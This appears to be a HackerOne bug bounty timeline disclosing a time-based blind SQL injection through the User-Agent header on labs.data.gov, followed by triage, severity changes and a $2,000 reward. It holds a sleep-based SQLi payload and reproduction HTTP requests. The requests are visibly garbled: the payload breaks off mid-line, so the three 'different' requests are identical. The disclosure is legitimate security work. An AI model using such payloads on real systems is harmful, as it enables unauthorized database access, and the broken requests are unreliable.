

TIMELINE



harisec submitted a report to TTS Bug Bounty.

Dec 13th (about 1 year ago)

I've identified an SQL injection vulnerability in the website labs.data.gov that affects the endpoint \[/dashboard/datagov/csv_to_json \] and can be exploited via the User-Agent HTTP header.

I didn't extracted any data from the database, I've confirmed the vulnerability using sleep SQL queries with various arithmetic operations. The sleep command combined with the arithmetic operations will cause the server to sleep for various amounts of time depending on the result of the arithmetic operation.

For example, setting the value Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)

Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR' to the User-Agent header will cause the server to sleep for 25 (5*5) seconds.

To reproduce, send the following HTTPS request:

```
GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(nc X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
```

The server will respond after 25 (5*5) seconds - same as the value of the User-Agent: header.

Now, let's cause the server to respond immediately. We will send the value sleep(5*5*0) that is equivalent with 0.

```
GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(nc X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
```

The server responded immediately as 5*5*0 = 0.

Let's confirm it with another request: GET /dashboard/datagov/csv_to_json HTTP/1.1 Referer: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(nc X-Forwarded-For: 1 X-Requested-With: XMLHttpRequest Host: labs.data.gov Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */*

This time the payload contains 6*6-30 that is equal with 6. The server responded after 6 seconds.

These are just a few of the SQL queries with various arithmetic operations that I've tried to confirm this issue.

Impact

An attacker can manipulate the SQL statements that are sent to the MySQL database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database.

2 attachments:

F246419: sqli-labs-data-gov-ua-25sec.png F246420: sqli-labs-data-gov-ua-9sec.png



coffeecup (HackerOne staff) changed the status to O Triaged.

Dec 13th (about 1 year ago)

Hey @harisec -

Thank you for your submission. We have validated this issue and forwarded the report to the responsible team for this application. They will evaluate and let us know whether or not they will be implementing a fix.

Thanks!

coffeecup (HackerOne staff) updated the severity from High to High (8.2).

Dec 13th (about 1 year ago)



jjediny posted a comment.

Dec 13th (about 1 year ago)

Thank you this looks legitimate and validated (on this end too). We are working on a fix, thank you for your report



coffeecup (HackerOne staff) posted a comment.

Dec 13th (about 1 year ago)

Great find @harisec - We really appreciate your work and look forward to more reports from you in the future.

jjediny updated the severity from High (8.2) to Critical (9.4).

Dec 13th (about 1 year ago)

coffeecup (HackerOne staff) updated the severity from Critical (9.4) to Critical (9.1).

Dec 13th (about 1 year ago)



TTS Bug Bounty rewarded harisec with a \$2,000 bounty.

Dec 14th (about 1 year ago)

Congratulations! We are happy to award a \$2,000 bounty for this issue. We appreciate your work and look forward to more reports from you in the future! Please stay tuned as we work towards a fix.



harisec posted a comment.

Dec 14th (about 1 year ago) Thank you very much for the bounty!

